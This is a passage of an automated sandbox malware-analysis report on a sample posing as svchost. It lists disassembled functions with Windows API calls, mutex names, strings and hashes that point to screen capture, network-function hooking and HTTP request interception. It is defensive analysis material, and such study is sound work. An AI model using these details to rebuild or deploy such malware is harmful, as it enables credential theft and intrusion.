Part of subcall function 004017F0: HeapFree.KERNEL32(00000000), ref: 004019C5
Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019D2
Part of subcall function 004017F0: HeapValidate.KERNEL32(00000000), ref: 004019D5

_snprintf.MSVCRT ref: 00401EAA

Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019DE
Part of subcall function 004017F0: HeapFree.KERNEL32(00000000), ref: 004019E1
Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00401E65), ref: 004019F1
Part of subcall function 004017F0: HeapValidate.KERNEL32(00000000), ref: 004019F4
Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00401E65), ref: 00401A01
Part of subcall function 004017F0: HeapFree.KERNEL32(00000000), ref: 00401A04

_snprintf.MSVCRT ref: 00401EEA
_snprintf.MSVCRT ref: 00401F26
SwitchToThread.KERNEL32(?,?,00404D20,?,?,?), ref: 00401F6F
NetApiBufferFree.NETAPI32(?), ref: 00401F95

Strings

%s12, xrefs: 00401ED8
%s1, xrefs: 00401E98
%s123, xrefs: 00401F14

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
String ID: %s1$%s12$%s123
API String ID: 1588441251-2882894844
Opcode ID: 63274706b62708f42648d06670bacef668267c51d1314ddcf6f9b5beb05922d2
Instruction ID: d6d119788ade0702c334ba716b850de2f597c51d849c979d1570e7f46e431759
Opcode Fuzzy Hash: 63274706b62708f42648d06670bacef668267c51d1314ddcf6f9b5beb05922d2
Instruction Fuzzy Hash: 5651B6B25043015BD331DB54C844EEB73A8AFD8754F000A2EFA846B2D1DB78DA48CBA6

Function 02C780B0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 132memorythreadwindowCOMMON

Download Yara Rule

APIs

SetThreadDesktop.USER32(?,7622F590,762216B0,00000000), ref: 02C780BF
GetDC.USER32(00000000), ref: 02C780C7
GetDeviceCaps.GDI32(00000000,0000000A), ref: 02C780D8
GetDeviceCaps.GDI32(00000000,00000008), ref: 02C780E9
CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02C78100
GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02C78142
GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02C78152
DeleteObject.GDI32(00000000), ref: 02C78155
ReleaseDC.USER32(00000000,00000000), ref: 02C7815E
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C781B9
HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02C781D2
HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02C781EF
SetThreadDesktop.USER32(?), ref: 02C78224

Strings

(, xrefs: 02C7813B

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocBitsCapsDesktopDeviceThread$BitmapCompatibleCreateDeleteFreeObjectRelease
String ID: (
API String ID: 188880187-3887548279
Opcode ID: 65efba5e38bc7ffa8d34c9547869be9fddd69222542ae85b0bba9e9c45295b16
Instruction ID: e1d2fbe0d8736019194c9f376290799d48bd3895722b7c8204f9a690c898a7f7
Opcode Fuzzy Hash: 65efba5e38bc7ffa8d34c9547869be9fddd69222542ae85b0bba9e9c45295b16
Instruction Fuzzy Hash: CA415E71E81344AFDB11CFA9D889BDABBF8EF49710F1446A9E509E7280D7705911CBA0

Function 004010A0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111memoryfileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32('+@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00401A54,00000000,00000000,?,00000000), ref: 004010C6
GetFileSizeEx.KERNEL32(00000000,00401A54,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010E7
GetProcessHeap.KERNEL32(00000008,00401A67,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010FD
HeapAlloc.KERNEL32(00000000,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 00401104
memset.MSVCRT ref: 00401114
ReadFile.KERNEL32(?,00000000,00401A54,00000000,00000000,?,?,?,?,00401A54), ref: 00401133
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401145
HeapValidate.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401148
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401155
HeapFree.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401158
GetHandleInformation.KERNEL32(00000000,00000000,?,00401A54,00000000,00000000), ref: 00401173
CloseHandle.KERNEL32(00000000,?,00401A54,00000000,00000000), ref: 00401184
IsBadWritePtr.KERNEL32(?,00000004), ref: 00401194

Strings

'+@, xrefs: 004010C5

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$Handle$AllocCloseCreateFreeInformationReadSizeValidateWritememset
String ID: '+@
API String ID: 190975061-3270456718
Opcode ID: 8acb88134f09bb4553fa1f20c980ac2f479e22f48b63d87f01b3e3b6e2272333
Instruction ID: 9704cbedb43cf1f0123ea2a6f6cc4f04c30b9336f8140f0f9319c9250b15b478
Opcode Fuzzy Hash: 8acb88134f09bb4553fa1f20c980ac2f479e22f48b63d87f01b3e3b6e2272333
Instruction Fuzzy Hash: EF3176B2A01214ABD7109BA59D48F6B7B6CEB88B51F144236FF04F7290D7349D0186A8

Function 02C8F0A0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 98memoryfileCOMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(?,?,00000000,00000000,75AF7390), ref: 02C8F0DD
GetProcessHeap.KERNEL32(00000008,?), ref: 02C8F0F4
HeapAlloc.KERNEL32(00000000), ref: 02C8F0FB
memset.MSVCRT ref: 02C8F10B
ReadFile.KERNEL32 ref: 02C8F12C
StrStrA.SHLWAPI(00000000,BEGIN SIGNATURE), ref: 02C8F142
StrStrA.SHLWAPI(00000000,END SIGNATURE), ref: 02C8F14E
SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,75AF7390), ref: 02C8F172
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8F185
HeapValidate.KERNEL32(00000000), ref: 02C8F188
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8F195
HeapFree.KERNEL32(00000000), ref: 02C8F198

Strings

END SIGNATURE, xrefs: 02C8F148
BEGIN SIGNATURE, xrefs: 02C8F13C

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$AllocFreePointerReadSizeValidatememset
String ID: BEGIN SIGNATURE$END SIGNATURE
API String ID: 2165369453-4158457813
Opcode ID: 5cc793cfcd844ed135731521aff2ba7705046535c27c244f156e8f9c38b85ce1
Instruction ID: 205416860f5337fade4d07def29ba387aed30ced77a7123e8de2b8e9bd581d6e
Opcode Fuzzy Hash: 5cc793cfcd844ed135731521aff2ba7705046535c27c244f156e8f9c38b85ce1
Instruction Fuzzy Hash: B331AD71E41355ABE721AF25DC44F6BB7ACEF84B58F008A1DF90487180DB30DA148BB2

Function 02C882E0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(advapi32.dll,00000000,00000000,7622F550,7622DF10,02C8475B), ref: 02C882F1
GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 02C88303

Part of subcall function 02C88FC0: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7622F550,00000000,7693BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88FF8
Part of subcall function 02C88FC0: memcpy.MSVCRT(?,?,00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89020
Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(00000000,?,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890B5
Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(?,00000000,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890CA

LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02C88322
GetProcAddress.KERNEL32(00000000,send), ref: 02C88330
GetProcAddress.KERNEL32(00000000,WSASend), ref: 02C8834C
GetProcAddress.KERNEL32(00000000,WSARecv), ref: 02C88368
GetProcAddress.KERNEL32(00000000,recv), ref: 02C88384

Strings

WSARecv, xrefs: 02C88362
advapi32.dll, xrefs: 02C882EC
ws2_32.dll, xrefs: 02C8831D
send, xrefs: 02C8832A
recv, xrefs: 02C8837E
CryptEncrypt, xrefs: 02C882FD
WSASend, xrefs: 02C88346

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$Virtual$LibraryLoadProtect$Allocmemcpy
String ID: CryptEncrypt$WSARecv$WSASend$advapi32.dll$recv$send$ws2_32.dll
API String ID: 1216545827-2206184491
Opcode ID: 009819cbb39ec59092b7244a0fa23995c21bc4da5a30ebe04a12004182c48b34
Instruction ID: 9a52b65efe7a915dc87aac047ecc0af53a9f84a6923bcf0b944caf202d9e69fa
Opcode Fuzzy Hash: 009819cbb39ec59092b7244a0fa23995c21bc4da5a30ebe04a12004182c48b34
Instruction Fuzzy Hash: E3010C76BC032A30F92231751C02F6A824E5FC1ECDF968B31B906F25C4DA95E60648B8

Function 02C902E0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 56sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02C9030C
ReleaseMutex.KERNEL32(00000000), ref: 02C90319
GetHandleInformation.KERNEL32(00000000,?), ref: 02C9032D
CloseHandle.KERNEL32(00000000), ref: 02C9033F
CreateThread.KERNEL32(00000000,00000000,02C90120,00000000,00000000,00000000), ref: 02C90350
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9035F
CloseHandle.KERNEL32(00000000), ref: 02C90366
PathAddBackslashA.SHLWAPI(82c31b90), ref: 02C9036D
Sleep.KERNEL32(00009C40,82c31b90,KBP), ref: 02C90387
Sleep.KERNEL32(00000064), ref: 02C90390

Strings

82c31b90, xrefs: 02C90368, 02C90378
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}, xrefs: 02C90300
P0#v, xrefs: 02C90319
KBP, xrefs: 02C90373

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
String ID: 82c31b90$KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0#v
API String ID: 4173420962-4163430638
Opcode ID: 0b6ec4265ed3d3e734c9b0a50e668aede8a2d102d3d211f6fd836f1ef9661c99
Instruction ID: 2da9133c6d81619bcd978588399cab9ea2d0523d7024d38c1b837b514c6b9bb9
Opcode Fuzzy Hash: 0b6ec4265ed3d3e734c9b0a50e668aede8a2d102d3d211f6fd836f1ef9661c99
Instruction Fuzzy Hash: 4701F930ECDB95BBFA1267614C0EF1A369C7F44B14F204750F919671C19BF4A90086AB

Function 02C902F8 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 45sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02C9030C
ReleaseMutex.KERNEL32(00000000), ref: 02C90319
GetHandleInformation.KERNEL32(00000000,?), ref: 02C9032D
CloseHandle.KERNEL32(00000000), ref: 02C9033F
CreateThread.KERNEL32(00000000,00000000,02C90120,00000000,00000000,00000000), ref: 02C90350
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9035F
CloseHandle.KERNEL32(00000000), ref: 02C90366
PathAddBackslashA.SHLWAPI(82c31b90), ref: 02C9036D
Sleep.KERNEL32(00009C40,82c31b90,KBP), ref: 02C90387
Sleep.KERNEL32(00000064), ref: 02C90390

Strings

82c31b90, xrefs: 02C90368, 02C90378
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}, xrefs: 02C90300
P0#v, xrefs: 02C90319
KBP, xrefs: 02C90373

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
String ID: 82c31b90$KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0#v
API String ID: 4173420962-4163430638
Opcode ID: 97050be5e3da743c5baca80d7397bbdf7b8c4a97e1dc2b43ffb38693e1ddc740
Instruction ID: 2fbf6114131304eca77c357c6b4215e969722fbf4bac548efdacd2700ee22b59
Opcode Fuzzy Hash: 97050be5e3da743c5baca80d7397bbdf7b8c4a97e1dc2b43ffb38693e1ddc740
Instruction Fuzzy Hash: B301D130AC9795BBFA222B304C0EF4E369CBF45B19F104750F91A661C0DBB499018AAB

Function 02C7DA80 Relevance: 21.4, APIs: 7, Strings: 7, Instructions: 411COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C7DA94
StrCmpNIA.SHLWAPI(00000002,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02C7E8FF,?,?), ref: 02C7DAF5
StrCmpNIA.SHLWAPI(00000001,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02C7E8FF,?,?), ref: 02C7DBB1
memcpy.MSVCRT(?,00000000,?,?,?,Content-Length,?,?,?,00000003,02C7E8FF,?,?,Host,?,?), ref: 02C7DCF3
memcpy.MSVCRT(00000000,http://,00000007,?,?,Content-Length,?,?,?,00000003,02C7E8FF,?,?,Host,?,?), ref: 02C7DDAE
memcpy.MSVCRT(?,?,00000000,00000000,http://,00000007,?,?,Content-Length,?,?,?,00000003,02C7E8FF,?,?), ref: 02C7DDBF
memcpy.MSVCRT(?,?,?,Host,?,?,?,00000000,?,?,?,00000000), ref: 02C7DDF1

Strings

Content-Length, xrefs: 02C7DCAD
Referer, xrefs: 02C7DE08
https://, xrefs: 02C7DD82, 02C7DDAC
Content-Type, xrefs: 02C7DE5D
http://, xrefs: 02C7DD40
Host, xrefs: 02C7DC70
NSS layer, xrefs: 02C7DD61

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: memcpy$memset
String ID: Content-Length$Content-Type$Host$NSS layer$Referer$http://$https://
API String ID: 438689982-3158524741
Opcode ID: 8d59738fe5088c2eaf57886d77d28275053c8d2c12aedd217a0793f37a8cd660
Instruction ID: dd3732c7711ec3d45edace044122e002dbadd5e24b6794fc6baae500f18ee1ff
Opcode Fuzzy Hash: 8d59738fe5088c2eaf57886d77d28275053c8d2c12aedd217a0793f37a8cd660
Instruction Fuzzy Hash: 85D12A76E0025A9BDF25CE68C880BEEBBB5FF85314F144169D857AB240D730DA41CBA5

Function 02C9B080 Relevance: 21.2, APIs: 14, Instructions: 212COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 02C9B0CD
free.MSVCRT ref: 02C9B0FA
free.MSVCRT ref: 02C9B113
free.MSVCRT ref: 02C9B126
free.MSVCRT ref: 02C9B149
free.MSVCRT ref: 02C9B1BC
free.MSVCRT ref: 02C9B21D
free.MSVCRT ref: 02C9B236
free.MSVCRT ref: 02C9B26D
free.MSVCRT ref: 02C9B282
free.MSVCRT ref: 02C9B2B3
free.MSVCRT ref: 02C9B2C8
free.MSVCRT ref: 02C9B2D8
free.MSVCRT ref: 02C9B2DE

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: free$closesocket
String ID:
API String ID: 3865430558-0
Opcode ID: 910a31fd0c6bd9dc90c70c11b12ace9fc46aebbc3afe7f0e71b855cb4b104ca5
Instruction ID: bf6d14dd3a9724a07df7cd090e182fe84bab0acc79f7ff47ea8ec59b600bc34a
Opcode Fuzzy Hash: 910a31fd0c6bd9dc90c70c11b12ace9fc46aebbc3afe7f0e71b855cb4b104ca5
Instruction Fuzzy Hash: BC813EB0A00A12AFCB14CF28E888A56B7E4FF48708F184669D81ADB341D735FE55CBD5

Function 02C78240 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 120filesynchronizationmemoryCOMMON

Download Yara Rule

APIs

SetThreadDesktop.USER32(?,76233050,762330D0,76233080), ref: 02C78280
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C78294
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7829F
UnmapViewOfFile.KERNEL32(00000000,?,00000006,00000000), ref: 02C782C7
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C782E4
CloseHandle.KERNEL32(00000000), ref: 02C782F5
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CBD66C), ref: 02C78315
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02C7832C
HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02C7836C
ReleaseMutex.KERNEL32(00000000,0000007E,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02C783B4
ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02C783BD

Strings

P0#v, xrefs: 02C783AD

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: File$HandleMutexObjectReleaseSingleViewWait$CloseCreateDesktopFreeHeapInformationMappingThreadUnmap
String ID: P0#v
API String ID: 2125184990-3387790918
Opcode ID: 3d0d9e5a832b1a5d5dcd235c828ed90d58ccb9c141292ec40fc273a3ff7295ab
Instruction ID: 3d477f1b7a102f56b4d127cad5f1c2a6d0e46db0bc53025ec961f26a942f3015
Opcode Fuzzy Hash: 3d0d9e5a832b1a5d5dcd235c828ed90d58ccb9c141292ec40fc273a3ff7295ab
Instruction Fuzzy Hash: 1441A171E80344ABD7119B74EC59F6A77A9EB88711F208F49FA11972C0CB74A920DFA0

Function 02C7F300 Relevance: 21.1, APIs: 14, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02C7F84A,00000000,?), ref: 02C7F32B
HeapValidate.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F32E
GetProcessHeap.KERNEL32(00000000,?,?,02C7F84A,00000000,?), ref: 02C7F33B
HeapFree.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F33E
GetHandleInformation.KERNEL32(?,00000000,00000000,?,00000000,?,02C7F84A,00000000,?), ref: 02C7F357
CloseHandle.KERNEL32(?,?,02C7F84A,00000000,?), ref: 02C7F368
GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02C7F84A,00000000,?), ref: 02C7F378
HeapValidate.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F37B
GetProcessHeap.KERNEL32(00000000,?,?,02C7F84A,00000000,?), ref: 02C7F388
HeapFree.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F38B
GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02C7F84A,00000000,?), ref: 02C7F39B
HeapValidate.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F39E
GetProcessHeap.KERNEL32(00000000,?,?,02C7F84A,00000000,?), ref: 02C7F3AB
HeapFree.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F3AE

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidate$Handle$CloseInformation
String ID:
API String ID: 2935687291-0
Opcode ID: d4623eed16cd5b81bbe464dcc97bed0d395a8c6cc79f28935bf282846adab503
Instruction ID: c67f42e586b1c9d74857217d00ebd9190e317d3f43df894b3a5983a969eb7d9b
Opcode Fuzzy Hash: d4623eed16cd5b81bbe464dcc97bed0d395a8c6cc79f28935bf282846adab503
Instruction Fuzzy Hash: 5431F031E853606BDB25AF61E8C8B5B7BACFF88B25F04856AED09D7240C735C500CAE1

Function 02C80820 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 89memorystringCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02C80825
GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,7622F550,76231620,80000002,?,?,02C84818), ref: 02C80872
HeapValidate.KERNEL32(00000000,?,?,02C84818), ref: 02C80875
GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C84818), ref: 02C80882
HeapFree.KERNEL32(00000000,?,?,02C84818), ref: 02C80885
strstr.MSVCRT ref: 02C8089B
strstr.MSVCRT ref: 02C808B9
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,02C84818), ref: 02C808E7
HeapValidate.KERNEL32(00000000,?,?,?,?,02C84818), ref: 02C808EA
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,02C84818), ref: 02C808F7
HeapFree.KERNEL32(00000000,?,?,?,?,02C84818), ref: 02C808FA

Part of subcall function 02C80570: memset.MSVCRT ref: 02C805A3
Part of subcall function 02C80570: memset.MSVCRT ref: 02C805BB
Part of subcall function 02C80570: RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,80000002,?,?,?,?,7622F550,76231620), ref: 02C805DC
Part of subcall function 02C80570: RegQueryValueExA.ADVAPI32(80000002,7D2DE64Fa,00000000,00000001,?,00000104,?,?,?,?,7622F550,76231620), ref: 02C80603
Part of subcall function 02C80570: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,?,?,7622F550,76231620), ref: 02C8068D
Part of subcall function 02C80570: HeapAlloc.KERNEL32(00000000,?,?,?,?,7622F550,76231620), ref: 02C80694
Part of subcall function 02C80570: memset.MSVCRT ref: 02C806A3

Strings

set_url , xrefs: 02C8088F, 02C808B0

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$memset$FreeValidatestrstr$AdminAllocOpenQueryUserValue
String ID: set_url
API String ID: 3462927349-1295111526
Opcode ID: cda620ee7f2803b62b935c1a84ab0733a82987d75eb891d8c4ea899b9dbdd7a6
Instruction ID: d2685373e9730747ddc9d2bdb1d73698abc7836ff454eabe2fa69123fa625bc9
Opcode Fuzzy Hash: cda620ee7f2803b62b935c1a84ab0733a82987d75eb891d8c4ea899b9dbdd7a6
Instruction Fuzzy Hash: B6212632E8637567E63236615C09F5B6A889FC0B59F098664ED08BB240EB61DE48C6F1

Function 02C92A30 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 56sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02C92A4C
Sleep.KERNEL32(00000064), ref: 02C92A62
OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02C92A70
ReleaseMutex.KERNEL32(00000000), ref: 02C92A79
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C92A91
CloseHandle.KERNEL32(00000000), ref: 02C92AA3
PathAddBackslashA.SHLWAPI(82c31cf4), ref: 02C92AAE
Sleep.KERNEL32(00009C40,82c31cf4,VEFK), ref: 02C92AC8

Strings

82c31cf4, xrefs: 02C92AA9, 02C92AB9
P0#v, xrefs: 02C92A79
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}, xrefs: 02C92A40, 02C92A64
VEFK, xrefs: 02C92AB4

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
String ID: 82c31cf4$Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0#v$VEFK
API String ID: 849374196-1622325707
Opcode ID: c4985611d2668c2d8f8bfd40c92cc39a25d6909fd499e99ca8dcf408cf499dbb
Instruction ID: cf5307aaa716208c13d45688a6128ea76d6d682987b08c38524c8f77d182b2d5
Opcode Fuzzy Hash: c4985611d2668c2d8f8bfd40c92cc39a25d6909fd499e99ca8dcf408cf499dbb
Instruction Fuzzy Hash: 6901FE32EC57543BFB22A7619C0DF5A778CAF44B20F044658FD8597181DFB0951046EB

Function 02C8D990 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 56sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}), ref: 02C8D9AC
Sleep.KERNEL32(00000064), ref: 02C8D9C2
OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}), ref: 02C8D9D0
